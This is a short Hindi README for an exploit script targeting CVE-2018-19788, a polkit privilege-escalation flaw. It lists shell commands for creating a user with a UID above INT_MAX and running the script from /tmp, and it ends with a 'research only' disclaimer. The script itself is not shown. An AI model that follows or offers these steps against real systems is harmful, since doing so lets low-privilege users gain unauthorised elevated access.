
CVE-2018-19788 के लिए बहुत ही आसान एक्सप्लॉइट
CVE-2018-19788 के लिए एक साधारण आसान शोषण
इसका उपयोग करने के लिए, आपको या तो Policy Kit में UID > INT_MAX वाला उपयोगकर्ता बनाना होगा या पहले से ही उक्त UID वाला निम्न-विशेषाधिकार वाला उपयोगकर्ता होना चाहिए।
UID को उपयोगकर्ता निर्माण में निम्नानुसार निर्दिष्ट किया जा सकता है, और स्क्रिप्ट के निष्पादन से पहले उपयोग किया जा सकता है:
$ useradd -u 4000000001 PrivEsc
$ passwd PrivEsc
$ su PrivEsc
$ chmod +x /tmp/CVE-2018-19788_PrivEsc.sh
$ ./tmp/CVE-2018-19788_PrivEsc.sh
कृपया ध्यान दें कि यह केवल शोध के लिए है और आप इस रिपॉजिटरी या किसी अन्य में पाए गए किसी भी कोड के अपने स्वयं के उपयोग के लिए जिम्मेदार हैं, जैसा कि सामान्य ज्ञान निर्धारित करता है।